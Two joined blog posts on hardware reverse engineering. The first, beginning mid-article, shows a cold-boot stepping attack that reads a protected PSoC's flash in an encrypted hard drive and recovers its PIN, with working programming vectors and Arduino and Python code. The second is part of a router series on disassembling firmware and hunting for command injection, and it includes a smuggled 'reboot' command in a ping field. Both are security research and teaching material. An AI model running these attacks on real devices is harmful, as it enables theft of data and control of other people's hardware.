And lo ! The following new vector appears:

[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[9F A0 1C] wrmem 0xFD, 0x00           # Unknown args
[9F E0 1C] wrmem 0xFF, 0x00           # same
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 02 1C] wrreg A (f0), 0x10         # Undocumented syscall !
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

By using this vector (see read_security_data in psoc.py), we get all the protection bits in SRAM at 0x80, with 2 bits per block.

The result is depressing: everything is protected in “Disable external read and write” mode ; so we cannot even write to the flash to insert a ROM dumper. The only way to reset the protection is to erase the whole chip 🙁

First (failed) attack: ROMX

However, we can try a trick: since we can execute arbitrary opcodes, why not execute ROMX, which is used to read the flash ?

The reasoning here is that the SROM ReadBlock function used by the programming vectors will verify if it is called from ISSP. However, the ROMX opcode probably has no such check.

So, in Python (after adding a few helpers in the Arduino C code):

for i in range(0, 8192):
    write_reg(0xF0, i>>8)        # A = 0
    write_reg(0xF3, i&0xFF)      # X = 0
    exec_opcodes("\x28\x30\x40") # ROMX, HALT, NOP
    byte = read_reg(0xF0)        # ROMX reads ROM[A|X] into A
    print "%02x" % ord(byte[0])  # print ROM byte

Unfortunately, it does not work 🙁 Or rather, it works, but we get our own opcodes (0x28 0x30 0x40) back ! I do not think it was intended as a protection, but rather as an engineering trick: when executing external opcodes, the ROM bus is rewired to a temporary buffer.

Second attack: cold boot stepping

Since ROMX did not work, I thought about using a variation of the trick described in section 3.1 of Johannes Obermaier and Stefan Tatschner’s paper: Shedding too much Light on a Microcontroller’s Firmware Protection.

Implementation

The ISSP manual give us the following CHECKSUM-SETUP vector:

[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[9F 40 1C] wrmem BLOCKID, 0x00
[DE 00 FC] wrreg A (f0), 0x07
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

Which is just a call to SROM function 0x07, documented as follows (emphasis mine):

The Checksum function calculates a 16-bit checksum over a user specifiable number of blocks, within a single Flash bank starting at block zero. The BLOCKID parameter is used to pass in the number of blocks to checksum. A BLOCKID value of ‘1’ will calculate the checksum of only block 0, while a BLOCKID value of ‘0’ will calculate the checksum of 256 blocks in the bank. The 16-bit checksum is returned in KEY1 and KEY2. The parameter KEY1 holds the lower 8 bits of the checksum and the parameter KEY2 holds the upper 8 bits of the checksum. For devices with multiple Flash banks, the checksum func- tion must be called once for each Flash bank. The SROM Checksum function will operate on the Flash bank indicated by the Bank bit in the FLS_PR1 register.

Note that it is an actual checksum: bytes are summed one by one, no fancy CRC here. Also, considering the extremely limited register set of the M8C core, I suspected that the checksum would be directly stored in RAM, most probably in its final location: KEY1 (0xF8) / KEY2 (0xF9).

So the final attack is, in theory:

  1. Connect using ISSP
  2. Start a checksum computation using the CHECKSUM-SETUP vector
  3. Reset the CPU after some time T
  4. Read the RAM to get the current checksum C
  5. Repeat 3. and 4., increasing T a little each time
  6. Recover the flash content by substracting consecutive checkums C

However, we have a problem: the Initialize-1 vector, which we have to send after reset, overwrites KEY1 and KEY:

1100101000000000000000                 # Magic to put the PSoC in prog mode
nop
nop
nop
nop
nop
[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A            # Checksum overwritten here
[9F 20 7C] wrmem KEY2, 0x03            # and here
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 01 3C] wrreg A (f0), 0x09          # SROM function 9
[DF 00 1C] wrreg opc0 (f8), 0x00       # SSC
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

But this code, overwriting our precious checksum, is just calling Calibrate1 (SROM function 9)… Maybe we can just send the magic to enter prog mode and then read the SRAM ?

And yes, it works !

The Arduino code implementing the attack is quite simple:

    case Cmnd_STK_START_CSUM:
      checksum_delay = ((uint32_t)getch())<<24;
      checksum_delay |= ((uint32_t)getch())<<16;
      checksum_delay |= ((uint32_t)getch())<<8;
      checksum_delay |= getch();
      if(checksum_delay > 10000) {
         ms_delay = checksum_delay/1000;
         checksum_delay = checksum_delay%1000;
      }
      else {
         ms_delay = 0;
      }
      send_checksum_v();
      if(checksum_delay)
          delayMicroseconds(checksum_delay);
      delay(ms_delay);
      start_pmode();
  1. It reads the checkum_delay
  2. Starts computing the checkum (send_checksum_v)
  3. Waits for the appropriate amount of time, with some caveats:
    • I lost some time here until I realized delayMicroseconds is precise only up to 16383µs)
    • and then again because delayMicroseconds(0) is totally wrong !
  4. Resets the PSoC to prog mode (without sending the initialization vectors, just the magic)

The final Python code is:

for delay in range(0, 150000):                          # delay in microseconds
    for i in range(0, 10):                              # number of reads for each delay
        try:
            reset_psoc(quiet=True)                      # reset and enter prog mode
            send_vectors()                              # send init vectors
            ser.write("\x85"+struct.pack(">I", delay))  # do checksum + reset after delay
            res = ser.read(1)                           # read arduino ACK
        except Exception as e:
            print e
            ser.close()
            os.system("timeout -s KILL 1s picocom -b 115200 /dev/ttyACM0 2>&1 > /dev/null")
            ser = serial.Serial('/dev/ttyACM0', 115200, timeout=0.5)  # open serial port
            continue
        print "%05d %02X %02X %02X" % (delay,           # read RAM bytes
                                       read_regb(0xf1),
                                       read_ramb(0xf8),
                                       read_ramb(0xf9))

What it does is simple:

  1. Reset the PSoC (and send the magic)
  2. Send the full initialization vectors
  3. Call the Cmnd_STK_START_CSUM (0x85) function on the Arduino, with a delay argument in microseconds.
  4. Reads the checksum (0xF8 and 0xF9) and the 0xF1 undocumented registers

This, 10 times per 1 microsecond step.

0xF1 is included as it was the only register that seemed to change while computing the checksum. It could be some temporary register used by the ALU ?

Note the ugly hack I use to reset the Arduino using picocom, when it stops responding (I have no idea why).

Reading the results

The output of the Python script looks like this (simplified for readability):

DELAY F1 F8 F9  # F1 is the unknown reg
                # F8 is the checksum LSB
                # F9 is the checksum MSB

00000 03 E1 19
[...]
00016 F9 00 03
00016 F9 00 00
00016 F9 00 03
00016 F9 00 03
00016 F9 00 03
00016 F9 00 00  # Checksum is reset to 0
00017 FB 00 00
[...]
00023 F8 00 00
00024 80 80 00  # First byte is 0x0080-0x0000 = 0x80 
00024 80 80 00
00024 80 80 00
[...]
00057 CC E7 00  # 2nd byte is 0xE7-0x80: 0x67
00057 CC E7 00
00057 01 17 01  # I have no idea what's going on here
00057 01 17 01
00057 01 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 F8 E7 00  # E7 is back ?
00058 D0 17 01
[...]
00059 E7 E7 00
00060 17 17 00  # Hmmm
[...]
00062 00 17 00
00062 00 17 00
00063 01 17 01  # Oh ! Carry is propagated to MSB
00063 01 17 01
[...]
00075 CC 17 01  # So 0x117-0xE7: 0x30

We however have the the problem that since we have a real check sum, a null byte will not change the value, so we cannot only look for changes in the checksum. But, since the full (8192 bytes) computation runs in 0.1478s, which translates to about 18.04µs per byte, we can use this timing to sample the value of the checksum at the right points in time.

Of course at the beginning, everything is “easy” to read as the variation in execution time is negligible. But the end of the dump is less precise as the variability of each run increases:

134023 D0 02 DD
134023 CC D2 DC
134023 CC D2 DC
134023 CC D2 DC
134023 FB D2 DC
134023 3F D2 DC
134023 CC D2 DC
134024 02 02 DC
134024 CC D2 DC
134024 F9 02 DC
134024 03 02 DD
134024 21 02 DD
134024 02 D2 DC
134024 02 02 DC
134024 02 02 DC
134024 F8 D2 DC
134024 F8 D2 DC
134025 CC D2 DC
134025 EF D2 DC
134025 21 02 DD
134025 F8 D2 DC
134025 21 02 DD
134025 CC D2 DC
134025 04 D2 DC
134025 FB D2 DC
134025 CC D2 DC
134025 FB 02 DD
134026 03 02 DD
134026 21 02 DD

Hence the 10 dumps for each µs of delay. The total running time to dump the 8192 bytes of flash was about 48h.

Reconstructing the flash image

I have not yet written the code to fully recover the flash, taking into account all the timing problems. However, I did recover the beginning. To make sure it was correct, I disassembled it with m8cdis:

0000: 80 67     jmp   0068h         ; Reset vector
[...]
0068: 71 10     or    F,010h
006a: 62 e3 87  mov   reg[VLT_CR],087h
006d: 70 ef     and   F,0efh
006f: 41 fe fb  and   reg[CPU_SCR1],0fbh
0072: 50 80     mov   A,080h
0074: 4e        swap  A,SP
0075: 55 fa 01  mov   [0fah],001h
0078: 4f        mov   X,SP
0079: 5b        mov   A,X
007a: 01 03     add   A,003h
007c: 53 f9     mov   [0f9h],A
007e: 55 f8 3a  mov   [0f8h],03ah
0081: 50 06     mov   A,006h
0083: 00        ssc
[...]
0122: 18        pop   A
0123: 71 10     or    F,010h
0125: 43 e3 10  or    reg[VLT_CR],010h
0128: 70 00     and   F,000h ; Paging mode changed from 3 to 0
012a: ef 62     jacc  008dh
012c: e0 00     jacc  012dh
012e: 71 10     or    F,010h
0130: 62 e0 02  mov   reg[OSC_CR0],002h
0133: 70 ef     and   F,0efh
0135: 62 e2 00  mov   reg[INT_VC],000h
0138: 7c 19 30  lcall 1930h
013b: 8f ff     jmp   013bh
013d: 50 08     mov   A,008h
013f: 7f        ret

It looks good !

Locating the PIN address

Now that we can read the checksum at arbitrary points in time, we can check easily if and where it changes after:

  • entering a wrong PIN
  • changing the PIN

First, to locate the approximate location, I dumped the checksum in steps for 10ms after reset. Then I entered a wrong PIN and did the same.

The results were not very nice as there’s a lot of variation, but it appeared that the checksum changes between 120000µs and 140000µs of delay. Which was actually completely false and an artefact of delayMicrosecondsdoing non-sense when called with 0.

Then, after losing about 3 hours, I remembered that the SROM’s CheckSum syscall has an argument that allows to specify the number of blocks to checksum ! So we can easily locate the PIN and “bad PIN” counter down to a 64-byte block.

My initial runs gave:

No bad PIN          |   14 tries remaining  |   13 tries remaining
                    |                       |
block 125 : 0x47E2  |   block 125 : 0x47E2  |   block 125 : 0x47E2
block 126 : 0x6385  |   block 126 : 0x634F  |   block 126 : 0x6324
block 127 : 0x6385  |   block 127 : 0x634F  |   block 127 : 0x6324
block 128 : 0x82BC  |   block 128 : 0x8286  |   block 128 : 0x825B

Then I changed the PIN from “123456” to “1234567”, and I got:

No bad try            14 tries remaining
block 125 : 0x47E2    block 125 : 0x47E2
block 126 : 0x63BE    block 126 : 0x6355
block 127 : 0x63BE    block 127 : 0x6355
block 128 : 0x82F5    block 128 : 0x828C

So both the PIN and “bad PIN” counter seem to be stored in block 126.

Dumping block 126

Block 126 should be about 125x64x18 = 144000µs after the start of the checksum. So make sure, I looked for checksum 0x47E2 in my full dump, and it looked more or less correct.

Then, after dumping lots of imprecise (because of timing) data, manually fixing the results and comparing flash values (by staring at them), I finally got the following bytes at delay 145527µs:

PIN          Flash content
1234567      2526272021222319141402
123456       2526272021221919141402
998877       2d2d2c2c23231914141402
0987654      242d2c2322212019141402
123456789    252627202122232c2d1902

It is quite obvious that the PIN is stored directly in plaintext ! The values are not ASCII or raw values but probably reflect the readings from the capacitive keyboard.

Finally, I did some other tests to find where the “bad PIN” counter is, and found this :

Delay  CSUM
145996 56E5 (old: 56E2, val: 03)
146020 571B (old: 56E5, val: 36)
146045 5759 (old: 571B, val: 3E)
146061 57F2 (old: 5759, val: 99)
146083 58F1 (old: 57F2, val: FF) <<---- here
146100 58F2 (old: 58F1, val: 01)

0xFF means “15 tries” and it gets decremented with each bad PIN entered.

Recovering the PIN

Putting everything together, my ugly code for recovering the PIN is:

def dump_pin():
    pin_map = {0x24: "0", 0x25: "1", 0x26: "2", 0x27:"3", 0x20: "4", 0x21: "5",
               0x22: "6", 0x23: "7", 0x2c: "8", 0x2d: "9"}
    last_csum = 0
    pin_bytes = []
    for delay in range(145495, 145719, 16):
        csum = csum_at(delay, 1)
        byte = (csum-last_csum)&0xFF
        print "%05d %04x (%04x) => %02x" % (delay, csum, last_csum, byte)
        pin_bytes.append(byte)
        last_csum = csum
    print "PIN: ",
    for i in range(0, len(pin_bytes)):
        if pin_bytes[i] in pin_map:
            print pin_map[pin_bytes[i]],
    print

Which outputs:

$ ./psoc.py 
syncing:  KO  OK
Resetting PSoC:  KO  Resetting PSoC:  KO  Resetting PSoC:  OK
145495 53e2 (0000) => e2
145511 5407 (53e2) => 25
145527 542d (5407) => 26
145543 5454 (542d) => 27
145559 5474 (5454) => 20
145575 5495 (5474) => 21
145591 54b7 (5495) => 22
145607 54da (54b7) => 23
145623 5506 (54da) => 2c
145639 5506 (5506) => 00
145655 5533 (5506) => 2d
145671 554c (5533) => 19
145687 554e (554c) => 02
145703 554e (554e) => 00
PIN:  1 2 3 4 5 6 7 8 9

Great success !

Note that the delay values I used are probably valid only on the specific PSoC I have.

What’s next ?

So, to sum up on the PSoC side in the context of our Aigo HDD:

  • we can read the SRAM even when it’s protected (by design)
  • we can bypass the flash read protection by doing a cold-boot stepping attack and read the PIN directly

However, the attack is a bit painful to mount because of timing issues. We could improve it by:

  • writing a tool to correctly decode the cold-boot attack output
  • using a FPGA for more precise timings (or use Arduino hardware timers)
  • trying another attack: “enter wrong PIN, reset and dump RAM”, hopefully the good PIN will be stored in RAM for comparison. However, it is not easily doable on Arduino, as it outputs 5V while the board runs on 3.3V.

One very cool thing to try would be to use voltage glitching to bypass the read protection. If it can be made to work, it would give us absolutely accurate reads of the flash, instead of having to rely on checksum readings with poor timings.

As the SROM probably reads the flash protection bits in the ReadBlock “syscall”, we can maybe do the same as in described on Dmitry Nedospasov’s blog, a reimplementation of Chris Gerlinsky’s attack presented at REcon Brussels 2017.

One other fun thing would also be to decap the chip and image it to dump the SROM, uncovering undocumented syscalls and maybe vulnerabilities ?

Conclusion

To conclude, the drive’s security is broken, as it relies on a normal (not hardened) micro-controller to store the PIN… and I have not (yet) checked the data encryption part !

What should Aigo have done ? After reviewing a few encrypted HDD models, I did a presentation at SyScan in 2015 which highlights the challenges in designing a secure and usable encrypted external drive and gives a few options to do something better 🙂

Overall, I spent 2 week-ends and a few evenings, so probably around 40 hours from the very beginning (opening the drive) to the end (dumping the PIN), including writing those 2 blog posts. A very fun and interesting journey 😉

Practical Reverse Engineering Part 5 — Digging Through the Firmware

Projects and learnt lessons on Systems Security, Embedded Development, IoT and anything worth writing about

  • Part 1: Hunting for Debug Ports
  • Part 2: Scouting the Firmware
  • Part 3: Following the Data
  • Part 4: Dumping the Flash
  • Part 5: Digging Through the Firmware

In part 4 we extracted the entire firmware from the router and decompressed it. As I explained then, you can often get most of the firmware directly from the manufacturer’s website: Firmware upgrade binaries often contain partial or entire filesystems, or even entire firmwares.

In this post we’re gonna dig through the firmware to find potentially interesting code, common vulnerabilities, etc.

I’m gonna explain some basic theory on the Linux architecture, disassembling binaries, and other related concepts. Feel free to skip some of the parts marked as [Theory]; the real hunt starts at ‘Looking for the Default WiFi Password Generation Algorithm’. At the end of the day, we’re just: obtaining source code in case we can use it, using grep and common sense to find potentially interesting binaries, and disassembling them to find out how they work.

One step at a time.

Gathering and Analysing Open Source Components

GPL Licenses — What They Are and What to Expect [Theory]

Linux, U-Boot and other tools used in this router are licensed under the General Public License. This license mandates that the source code for any binaries built with GPL’d projects must be made available to anyone who wants it.

Having access to all that source code can be a massive advantage during the reversing process. The kernel and the bootloader are particularly interesting, and not just to find security issues.

When hunting for GPL’d sources you can usually expect one of these scenarios:

  1. The code is freely available on the manufacturer’s website, nicely ordered and completely open to be tinkered with. For instance: apple products or theamazon echo
  2. The source code is available by request
    • They send you an email with the sources you requested
    • They ask you for “a reasonable amount” of money to ship you a CD with the sources
  3. They decide to (illegally) ignore your requests. If this happens to you, consider being nice over trying to get nasty.

In the case of this router, the source code was available on their website, even though it was a huge pain in the ass to find; it took me a long time of manual and automated searching but I ended up finding it in the mobile version of the site:

ls -lh gpl_source

But what if they’re hiding something!? How could we possibly tell whether the sources they gave us are the same they used to compile the production binaries?

Challenges of Binary Verification [Theory]

Theoretically, we could try to compile the source code ourselves and compare the resulting binary with the one we extracted from the device. In practice, that is extremely more complicated than it sounds.

The exact contents of the binary are strongly tied to the toolchain and overall environment they were compiled in. We could try to replicate the environment of the original developers, finding the exact same versions of everything they used, so we can obtain the same results. Unfortunately, most compilers are not built with output replicability in mind; even if we managed to find the exact same version of everything, details like timestamps, processor-specific optimizations or file paths would stop us from getting a byte-for-byte identical match.

If you’d like to read more about it, I can recommend this paper. The authors go through the challenges they had to overcome in order to verify that the official binary releases of the application ‘TrueCrypt’ were not backdoored.

Introduction to the Architecture of Linux [Theory]

In multiple parts of the series, we’ve discussed the different components found in the firmware: bootloader, kernel, filesystem and some protected memory to store configuration data. In order to know where to look for what, it’s important to understand the overall architecture of the system. Let’s quickly review this device’s:

Linux Architecture

The bootloader is the first piece of code to be executed on boot. Its job is to prepare the kernel for execution, jump into it and stop running. From that point on, the kernel controls the hardware and uses it to run user space logic. A few more details on each of the components:

  1. Hardware: The CPU, Flash, RAM and other components are all physically connected
  2. Linux Kernel: It knows how to control the hardware. The developers take the Open Source Linux kernel, write drivers for their specific device and compile everything into an executable Kernel. It manages memory, reads and writes hardware registers, etc. In more complex systems, “kernel modules” provide the possibility of keeping device drivers as separate entities in the file system, and dynamically load them when required; most embedded systems don’t need that level of versatility, so developers save precious resources by compiling everything into the kernel
  3. libc (“The C Library”): It serves as a general purpose wrapper for the System Call API, including extremely common functions like printfmalloc or system. Developers are free to call the system call API directly, but in most cases, it’s MUCH more convenient to use libc. Instead of the extremely common glibc (GNU C library) we usually find in more powerful systems, this device uses a version optimised for embedded devices: uClibc.
  4. User Applications: Executable binaries in /bin/ and shared objects in /lib/(libraries that contain functions used by multiple binaries) comprise most of the high-level logic. Shared objects are used to save space by storing commonly used functions in a single location

Bootloader Source Code

As I’ve mentioned multiple times over this series, this router’s bootloader is U-Boot. U-Boot is GPL licensed, but Huawei failed to include the source code in their website’s release.

Having the source code for the bootloader can be very useful for some projects, where it can help you figure out how to run a custom firmware on the device or modify something; some bootloaders are much more feature-rich than others. In this case, I’m not interested in anything U-Boot has to offer, so I didn’t bother following up on the source code.

Kernel Source Code

Let’s just check out the source code and look for anything that might help. Remember the factory reset button? The button is part of the hardware layer, which means the GPIO pin that detects the button press must be controlled by the drivers. These are the logs we saw coming out of the UART port in a previous post:

UART system restore logs

With some simple grep commands we can see how the different components of the system (kernel, binaries and shared objects) can work together and produce the serial output we saw:

System reset button propagates to user space

Having the kernel can help us find poorly implemented security-related algorithms and other weaknesses that are sometimes considered ‘accepted risks’ by manufacturers. Most importantly, we can use the drivers to compile and run our own OS on the device.

User Space Source Code

As we can see in the GPL release, some components of the user space are also open source, such as busybox and iptables. Given the right (wrong) versions, public vulnerability databases could be enough to find exploits for any of these.

That being said, if you’re looking for 0-days, backdoors or sensitive data, your best bet is not the open source projects. Devic specific and closed source code developed by the manufacturer or one of their providers has not been so heavily tested and may very well be riddled with bugs. Most of this code is stored as binaries in the user space; we’ve got the entire filesystem, so we’re good.

Without the source code for user space binaries, we need to find a way to read the machine code inside them. That’s where disassembly comes in.

Binary Disassembly [Theory]

The code inside every executable binary is just a compilation of instructions encoded as Machine Code so they can be processed by the CPU. Our processor’s datasheet will explain the direct equivalence between assembly instructions and their machine code representations. A disassembler has been given that equivalence so it can go through the binary, find data and machine code andtranslate it into assembly. Assembly is not pretty, but at least it’s human-readable.

Due to the very low-level nature of the kernel, and how heavily it interacts with the hardware, it is incredibly difficult to make any sense of its binary. User space binaries, on the other hand, are abstracted away from the hardware and follow unix standards for calling conventions, binary format, etc. They’re an ideal target for disassembly.

There are lots of disassemblers for popular architectures like MIPS; some better than others both in terms of functionality and usability. I’d say these 3 are the most popular and powerful disassemblers in the market right now:

  • IDA Pro: By far the most popular disassembler/debugger in the market. It is extremely powerful, multi-platform, and there are loads of users, tutorials, plugins, etc. around it. Unfortunately, it’s also VERY expensive; a single person license of the Pro version (required to disassemble MIPS binaries) costs over $1000
  • Radare2: Completely Open Source, uses an impressively advanced command line interface, and there’s a great community of hackers around it. On the other hand, the complex command line interface -necessary for the sheer amount of features- makes for a rather steep learning curve
  • Binary Ninja: Not open source, but reasonably priced at $100 for a personal license, it’s middle ground between IDA and radare. It’s still a very new tool; it was just released this year, but it’s improving and gaining popularity day by day. It already works very well for some architectures, but unfortunately it’s still missing MIPS support (coming soon) and some other features I needed for these binaries. I look forward to giving it another try when it’s more mature

In order to display the assembly code in a more readable way, all these disasemblers use a “Graph View”. It provides an intuitive way to follow the different possible execution flows in the binary:

IDA Small Function Graph View

Such a clear representation of branches, and their conditionals, loops, etc. is extremely useful. Without it, we’d have to manually jump from one branch to another in the raw assembly code. Not so fun.

If you read the code in that function you can see the disassembler makes a great job displaying references to functions and hardcoded strings. That might be enough to help us find something juicy, but in most cases you’ll need to understand the assembly code to a certain extent.

Gathering Intel on the CPU and Its Assembly Code [Theory]

Let’s take a look at the format of our binaries:

$ file bin/busybox
bin/busybox: ELF 32-bit LSB executable, MIPS, MIPS-II version 1 (SYSV), dynamically linked (uses shared libs), corrupted section header size

Because ELF headers are designed to be platform-agnostic, we can easily find out some info about our binaries. As you can see, we know the architecture (32-bit MIPS), endianness (LSB), and whether it uses shared libraries.

We can verify that information thanks to the Ralink’s product brief, which specifies the processor core it uses: MIPS24KEc

Product Brief Highlighted Processor Core

With the exact version of the CPU core, we can easily find its datasheet as released by the company that designed it: Imagination Technologies.

Once we know the basics we can just drop the binary into the disassembler. It will help validate some of our findings, and provide us with the assembly code. In order to understand that code we’re gonna need to know the architecture’s instruction sets and register names:

  • MIPS Instruction Set
  • MIPS Pseudo-Instructions: Very simple combinations of basic instructions, used for developer/reverser convenience
  • MIPS Alternate Register Names: In MIPS, there’s no real difference between registers; the CPU doesn’t about what they’re called. Alternate register names exist to make the code more readable for the developer/reverser: $a0 to $a3 for function arguments, $t0 to $t9 for temporary registers, etc.

Beyond instructions and registers, some architectures may have some quirks. One example of this would be the presence of delay slots in MIPS: Instructions that appear immediately after branch instructions (e.g. beqzjalr) but are actually executed before the jump. That sort of non-linearity would be unthinkable in other architectures.

Some interesting links if you’re trying to learn MIPS: Intro to MIPS Reversing using Radare2MIPS Assembler and Runtime SimulatorToolchains to cross-compile for MIPS targets.

Example of User Space Binary Disassembly

Following up on the reset key example we were using for the Kernel, we’ve got the code that generated some of the UART log messages, but not all of them. Since we couldn’t find the ‘button has been pressed’ string in the kernel’s source code, we can deduce it must have come from user space. Let’s find out which binary printed it:

~/Tech/Reversing/Huawei-HG533_TalkTalk/router_filesystem
$ grep -i -r "restore default success" .
Binary file ./bin/cli matches
Binary file ./bin/equipcmd matches
Binary file ./lib/libcfmapi.so matches

3 files contain the next string found in the logs: 2 executables in /bin/ and 1 shared object in /lib/. Let’s take a look at /bin/equipcmd with IDA:

restore success string in /bin/equipcmd - IDA GUI

If we look closely, we can almost read the C code that was compiled into these instructions. We can see a “clear configuration file”, which would match the ERASEcommands we saw in the SPI traffic capture to the flash IC. Then, depending on the result, one of two strings is printed: restore default success or restore default fail . On success, it then prints something else, flushes some buffers and reboots; this also matches the behaviour we observed when we pressed the reset button.

That function is a perfect example of delay slots: the addiu instructions that set both strings as arguments —$a0— for the 2 puts are in the delay slots of the branch if equals zero and jump and link register instructions. They will actually be executed before branching/jumping.

As you can see, IDA has the name of all the functions in the binary. That won’t necessarily be the case in other binaries, and now’s a good time to discuss why.

Function Names in a Binary — Intro to Symbol Tables [Theory]

The ELF format specifies the usage of symbol tables: chunks of data inside a binary that provide useful debugging information. Part of that information are human-readable names for every function in the binary. This is extremely convenient for a developer debugging their binary, but in most cases it should be removed before releasing the production binary. The developers were nice enough to leave most of them in there 🙂

In order to remove them, the developers can use tools like strip, which know what must be kept and what can be spared. These tools serve a double purpose: They save memory by removing data that won’t be necessary at runtime, and they make the reversing process much more complicated for potential attackers. Function names give context to the code we’re looking at, which is massively helpful.

In some cases -mostly when disassembling shared objects- you may see somefunction names or none at all. The ones you WILL see are the Dynamic Symbols in the .dymsym table: We discussed earlier the massive amount of memory that can be saved by using shared objects to keep the pieces of code you need to re-use all over the system (e.g. printf()). In order to locate pieces of data inside the shared object, the caller uses their human-readable name. That means the names for functions and variables that need to be publicly accessible must be left in the binary. The rest of them can be removed, which is why ELF uses 2 symbol tables: .dynsym for publicly accessible symbols and .symtab for the internal ones.

For more details on symbol tables and other intricacies of the ELF format, check out: The ELF Format — How programs look from the insideInside ELF Symbol Tablesand the ELF spec (PDF).

Looking for the Default WiFi Password Generation Algorithm

What do We Know?

Remember the wifi password generation algorithm we discussed in part 3? (The Pot of Gold at the End of the Firmware) I explained then why I didn’t expect this router to have one, but let’s take a look anyway.

If you recall, these are the default WiFi credentials in my router:

Router Sticker - Annotated

So what do we know?

  1. Each device is pre-configured with a different set of WiFi credentials
  2. The credentials could be hardcoded at the factory or generated on the device. Either way, we know from previous posts that both SSID and password are stored in the reserved area of Flash memory, and they’re right next to each other
    • If they were hardcoded at the factory, the router only needs to read them from a known memory location
    • If they are generated in the device and then stored to flash, there must be an algorithm in the router that -given the same inputs- always generates the same outputs. If the inputs are public (e.g. the MAC address) and we can find, reverse and replicate the algorithm, we could calculate default WiFi passwords for any other router that uses the same algorithm

Let’s see what we can do with that…

Finding Hardcoded Strings

Let’s assume there IS such algorithm in the router. Between username and password, there’s only one string that remains constant across devices:TALKTALK-. This string is prepended to the last 6 characters of the MAC address. If the generation algorithm is in the router, surely this string must be hardcoded in there. Let’s look it up:

$ grep -r 'TALKTALK-' .
Binary file ./bin/cms matches
Binary file ./bin/nmbd matches
Binary file ./bin/smbd matches

2 of those 3 binaries (nmbd and smbd) are part of samba, the program used to use the USB flash drive as a network storage device. They’re probably used to identify the router over the network. Let’s take a look at the other one: /bin/cms.

Reversing the Functions that Uses Them

IDA TALKTALK-XXXXXX String Being Built

That looks exactly the way we’d expect the SSID generation algorithm to look. The code is located inside a rather large function called ATP_WLAN_Init, and somewhere in there it performs the following actions:

  1. Find out the MAC address of the device we’re running on:
    • mac = BSP_NET_GetBaseMacAddress()
  2. Create the SSID string:
    • snprintf(SSID, "TALKTALK-%02x%02x%02x", mac[3], mac[4], mac[5])
  3. Save the string somewhere:
    • ATP_DBSetPara(SavedRegister3, 0xE8801E09, SSID)

Unfortunately, right after this branch the function simply does an ATP_DBSave and moves on to start running commands and whatnot. e.g.:

ATP_WLAN_Init moves on before you

Further inspection of this function and other references to ATP_DBSave did not reveal anything interesting.

Giving Up

After some time using this process to find potentially relevant pieces of code, reverse them, and analyse them, I didn’t find anything that looked like the password generation algorithm. That would confirm the suspicions I’ve had since we found the default credentials in the protected flash area: The manufacturer used proper security techniques and flashed the credentials at the factory, which is why there is no algorithm. Since the designers manufacture their own hardware, the decision makes perfect sense for this device. They can do whatever they want with their manufacturing lines, so they decided to do it right.

I might take another look at it in the future, or try to find it in some other router (I’d like to document the process of reversing it), but you should know this method DOES work for a lot of products. There’s a long history of freely available default WiFi password generators.

Since we already know how to find relevant code in the filesystem binaries, let’s see what else we can do with that knowledge.

Looking for Command Injection Vulnerabilities

One of the most common, easy to find and dangerous vulnerabilities is command injection. The idea is simple; we find an input string that is gonna be used as an argument for a shell command. We try to append our own commands and get them to execute, bypassing any filters that the developers may have implemented. In embedded devices, such vulnerabilities often result in full root control of the device.

These vulnerabilities are particularly common in embedded devices due to their memory constraints. Say you’re developing the web interface used by the users to configure the device; you want to add the possibility to ping a user-defined server from the router, because it’s very valuable information to debug network problems. You need to give the user the option to define the ping target, and you need to serve them the results:

Router WEB Interface Ping in action

Once you receive the data of which server to target, you have two options: You find a library with the ICMP protocol implemented and call it directly from the web backend, or you could use a single, standard function call and use the router’s already existing ping shell command. The later is easier to implement, saves memory, etc. and it’s the obvious choice. Taking user input (target server address) and using it as part of a shell command is where the danger comes in. Let’s see how this router’s web application, /bin/web, handles it:

/bin/web's ping function

A call to libc’s system() (not to be confused with a system call/syscall) is the easiest way to execute a shell command from an application. Sometimes developers wrap system() in custom functions in order to systematically filter all inputs, but there’s always something the wrapper can’t do or some developer who doesn’t get the memo.

Looking for references to system in a binary is an excellent way to find vectors for command injections. Just investigate the ones that look like may be using unfiltered user input. These are all the references to system() in the /bin/web binary:

xrefs to system in /bin/web

Even the names of the functions can give you clues on whether or not a reference to system() will receive user input. We can also see some references to PIN and PUK codes, SIMs, etc. Seems like this application is also used in some mobile product…

I spent some time trying to find ways around the filtering provided byatp_gethostbyname (anything that isn’t a domain name causes an error), but I couldn’t find anything in this field or any others. Further analysis may prove me wrong. The idea would be to inject something to the effects of this:

Attempt reboot injection on ping field

Which would result in this final string being executed as a shell command: ping google.com -c 1; reboot; ping 192.168.1.1 > /dev/null. If the router reboots, we found a way in.

